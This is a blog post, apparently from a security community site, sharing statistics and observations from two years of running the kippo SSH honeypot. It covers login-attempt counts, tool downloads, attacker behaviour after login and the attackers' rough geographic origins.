For over two years now, my ssh-honeypot kippo (developed by Upi Tamminen) is receiving “visits” from all over the world. With an easy to guess root password 123456, to shorten the brute force attacks I have gathered some interesting data/statistics.

So to sum things up:

First attack on Monday, 26-Jul-2010, 09:11 AM
Total login attempts 474433
Distinct source IP addresses 2254

With the help from the kippo-graph project from @ikoniaris here are some stats


So, almost half a million login attempts. Thats a lot considering the honeypot holds only one ip address!

When the attackers are “in” they do all kinds of things. They change the root password for future use which is fine by me. This way I get some extra insight on the passwords they commonly use. The password isn't really changed of course, the honeypot just plays along.

They download windows service packs for instance. When done they throw them away again..why? Well, my guess is that they are just trying out my bandwidth to determine the amount of spam they can send out.
Some attacks seem to have similarities like checking out the cpu-info for instance.

And yes, they download the tools of their trade.

Here some numbers on that:

Total number of downloads 774
Distinct number of downloads 510

And they simply use the wget command to copy their tools from download locations like
And you know what, thats just fine by me too. Oh, and thanks for the copy !
They can even unpack the tools. But no, they can't use them. We don't want to be a staging point for them to attack more machines now, do we?

So, who are those people? Well, they are criminals for a start! Where do they come from? Analyzing the tools shows a lot of Romanian comment lines in there scripts. But that doesn’t mean that the attackers have to come from Romania as well! They can come from all over the world.

Here is my top 10
And this is an image with worldwide results

The grey icons means at least one attack and the blue more than one time.

So there are people out there, that make money using other peoples' bandwidth. It seems they don’t even care if they are detected. Some of them even tried to communicate with me (swear words mostly)

It was interesting to see how the attacks developed. The tools the attackers used. Yes, even the typo’s they made.
Fun times in general and most important, I learned a lot from my adversaries.
I plan to deploy more honeypots like kippo in the coming year.

If people are interested in more information about the wonderful world of honeypots, do visit the honeynet project page or donate to this great non-profit organisation.
Follow @ProjectHoneynet on twitter or “like” the facebook page for the latest updates and information on the various honeypot projects and challenges.

2012 has been a good year. Lets make 2013 even better!

Views: 1499


You need to be a member of Dissecting The Hack to add comments!

Join Dissecting The Hack

Latest Activity

Vivian Rivera updated their profile
Mar 2
Steve Brandidge updated their profile
Jan 28
SUR3SH0T updated their profile
Oct 20, 2020
Anton Vyacheslav is now a member of Dissecting The Hack
Dec 9, 2018

Stratagem 13 News Feed

© 2021   Created by Marcus J. Carey.   Powered by

Badges  |  Report an Issue  |  Terms of Service